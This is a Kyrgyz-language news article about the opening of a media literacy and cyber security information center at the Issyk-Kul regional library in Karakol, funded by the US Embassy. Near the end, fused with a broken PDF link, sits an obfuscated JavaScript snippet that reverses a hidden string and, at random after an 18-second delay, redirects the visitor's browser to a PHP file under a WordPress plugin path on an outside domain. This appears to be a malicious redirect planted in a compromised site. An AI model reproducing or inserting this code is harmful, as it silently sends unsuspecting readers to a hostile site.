МЕДИА САБАТТУУЛУК ЖАНА КИБЕР КООПСУЗДУК БОРБОРУ

25-февраль, 2022-ж. / Редакция / Жаңылыктар 43

Өткөн жуманын аягында Ысык-Көл облустук китепканасында Каракол Америка борборуна караштуу «Медиа сабаттуулук жана кибер коопсуздук боюнча маалымат борборунун» расмий ачылыш аземи болуп өттү. Ага Ысык-Көл облустук администрациясынын өкүлдөрү жана Каракол Америка борборунун окурмандары катышты. Иш-чарада “Жаш адистер үчүн англис тили” программасын  аяктагандар сертификат менен сыйланды. Бул программалар  АКШнын Кыргыз Республикасындагы элчилиги тарабынан колдоого алынган.

Жергиликтүү тургундарга заманбап жана жагымдуу шарттарды түзүүдө, ошондой эле ден соолугунун мүмкүнчүлүгү чектелген адамдарга китепкананын ресурстарын жеткиликтүү кылуу үчүн 2020-жылдын сентябрь айында АКШ элчилиги китепкананын эки бөлүмүн оңдоп-түзөө жана жаңы технологиялар менен камсыздоо иштерине 9 000 доллардан ашык акча каражатын бөлгөн. Бул долбоор айрыкча Министрлер Кабинетинин инклюзивдүү коом түзүү аракетин колдоо максатында ишке ашырылды.

Жакында 15 жылдыгын белгилеген Каракол Америка борбору өз коноктору үчүн түрдүү программаларды сунуштап келет. Анын ичинде маданий программалар, англис тили боюнча сабактар, VR-программалоо, код жазуу жана катышуучуларга келечекте киреше алып келүүчү чеберчилик боюнча семинарлар өтөт. Ошондой эле китепкананын АКШ элчилиги колдогон Медиа-борбору жалган маалыматка каршы турууга жана медиа сабаттуулукту жогорулатууга багытталган ресурстарды, программаларды сунуштайт. Борбордун башкы максаттарынын бири –  Ысык-Көл облусунун тургундарын маалымат, техникалык көндүмдөр менен жабдып, ар кандай медиа булактарынан алынган маалыматка туура баа берүү, талдоо, ой жүгүртүү жөндөмдөрүн бекемдөө. Борбор медиа жана компьютердик сабаттуулук боюнча семинарларды өткөрөт жана кесиптик көндүмдөрдү өнүктүрүү, англис тилин үйрөтүү, илимий жана техникалык билимдерди кеңейтүү, ошондой эле Америка Кошмо Штаттары тууралуу ишенимдүү маалымат алуу үчүн акысыз платформа катары кызматын улантат.

Каракол Америка борборунун “Медиа сабаттуулук жана кибер коопсуздук боюнча маалымат борбору” Каракол шаарынын Ысык-Көл облустук китепканасында аптасына беш күн бою иштейт. Маалымат алуу үчүн ackarakol@gmail.com. электрондук дарегине кайрылсаңыздар болот.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/25_02_organized.pdf»>2022-жылдын 25-февралы

Бактыгүл Кулатаева

25-февраль, 2022-ж. / Редакция / Жаңылыктар 43
Бөлүшүү: Telegram WhatsApp X